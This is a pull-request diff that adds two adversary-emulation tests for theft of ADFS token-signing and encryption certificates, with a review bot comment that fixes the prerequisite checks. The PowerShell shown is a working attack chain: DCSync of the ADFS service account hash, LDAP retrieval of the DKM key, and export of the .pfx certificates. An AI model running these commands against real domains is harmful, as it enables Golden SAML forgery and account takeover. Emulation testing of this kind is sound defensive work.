Merge pull request #1605 from piaconsigny/pr-adfs-certificates-theft
T1552.004: ADFS Certificates theft
@@ -103,3 +103,99 @@ atomic_tests:
|
||||
cleanup_command: |
|
||||
rm -rf #{output_folder}
|
||||
name: sh
|
||||
- name: ADFS token signing and encryption certificates theft - Local
|
||||
auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
|
||||
description: |
|
||||
Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
|
||||
Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
AADInternals module must be installed.
|
||||
prereq_command: |
|
||||
if (Get-Module AADInternals) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Install-Module -Name AADInternals -Force
|
||||
executor:
|
||||
command: |
|
||||
Import-Module AADInternals -Force
|
||||
Export-AADIntADFSCertificates
|
||||
Get-ChildItem | Where-Object {$_ -like "ADFS*"}
|
||||
Write-Host "`nCertificates retrieved successfully"
|
||||
cleanup_command: |
|
||||
Remove-Item -Path ".\ADFS_encryption.pfx"
|
||||
Remove-Item -Path ".\ADFS_signing.pfx"
|
||||
name: powershell
|
||||
- name: ADFS token signing and encryption certificates theft - Remote
|
||||
auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
|
||||
description: |
|
||||
Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
|
||||
Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
adfs_service_account_name:
|
||||
description: Name of the ADFS service account
|
||||
type: String
|
||||
default: "adfs_svc"
|
||||
replication_user:
|
||||
description: Username with replication rights. It can be the Domain Admin running the script
|
||||
type: String
|
||||
default: "Administrator"
|
||||
replication_password:
|
||||
description: Password of replication_username
|
||||
type: String
|
||||
default: "ReallyStrongPassword"
|
||||
adfs_server_name:
|
||||
description: Name of an ADFS server
|
||||
type: String
|
||||
default: "sts.contoso.com"
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
AADInternals and ActiveDirectory modules must be installed.
|
||||
prereq_command: |
|
||||
if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}
|
||||
get_prereq_command: |
|
||||
Install-Module -Name AADInternals -Force
|
||||
executor:
|
||||
command: |
|
||||
Import-Module ActiveDirectory -Force
|
||||
Import-Module AADInternals -Force | Out-Null
|
||||
#Get Configuration
|
||||
$dcServerName = (Get-ADDomainController).HostName
|
||||
$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}"
|
||||
$PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
|
||||
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
|
||||
# use DCSync to fetch the ADFS service account's NT hash
|
||||
$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex
|
||||
$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
|
||||
# Get certificates decryption key
|
||||
$Configuration = [xml]$ADFSConfig
|
||||
$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group
|
||||
$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName
|
||||
$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn
|
||||
$base = "LDAP://CN=$group,$container,$parent"
|
||||
$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))
|
||||
$ADSearch.Filter = '(name=CryptoPolicy)'
|
||||
$ADSearch.PropertiesToLoad.Clear()
|
||||
$ADSearch.PropertiesToLoad.Add("displayName") | Out-Null
|
||||
$aduser = $ADSearch.FindOne()
|
||||
$keyObjectGuid = $ADUser.Properties["displayName"]
|
||||
$ADSearch.PropertiesToLoad.Clear()
|
||||
$ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null
|
||||
$ADSearch.Filter="(l=$keyObjectGuid)"
|
||||
$aduser=$ADSearch.FindOne()
|
||||
$key=[byte[]]$aduser.Properties["thumbnailphoto"][0]
|
||||
# Get encrypted certificates from configuration and decrypt them
|
||||
Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key
|
||||
Get-ChildItem | Where-Object {$_ -like "ADFS*"}
|
||||
Write-Host "`nCertificates retrieved successfully"
|
||||
cleanup_command: |
|
||||
Remove-Item -Path ".\ADFS_encryption.pfx"
|
||||
Remove-Item -Path ".\ADFS_signing.pfx"
|
||||
name: powershell
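Review bot: The remote test's prereq_command (`if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}`) cannot report a failed prerequisite: `echo` only writes to the pipeline and the script still ends with exit code 0, so a missing module is presumably treated as satisfied and the executor then fails at `Import-Module`; the `-or` also contradicts the dependency text that says both AADInternals and ActiveDirectory are required. The local test already uses `exit 0`/`exit 1`, so make the remote check match it with `if ((Get-Module -ListAvailable -Name AADInternals) -and (Get-Module -ListAvailable -Name ActiveDirectory)) {exit 0} else {exit 1}` (`-ListAvailable` also avoids a spurious failure when the module is installed but not yet imported into the session). Since get_prereq_command only runs `Install-Module -Name AADInternals -Force`, the ActiveDirectory (RSAT) half of that check cannot be remediated automatically, and the dependency description should say so. Separately, `-ArgumentList #{replication_user}, $PWord` should quote the user as `"#{replication_user}"` so a value containing spaces or special characters is passed as one string, and the description should note that the plaintext `replication_password` interpolated into the script body will appear in PowerShell script block logs on the test host.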
|
||||
|
||||
|
||||
|
||||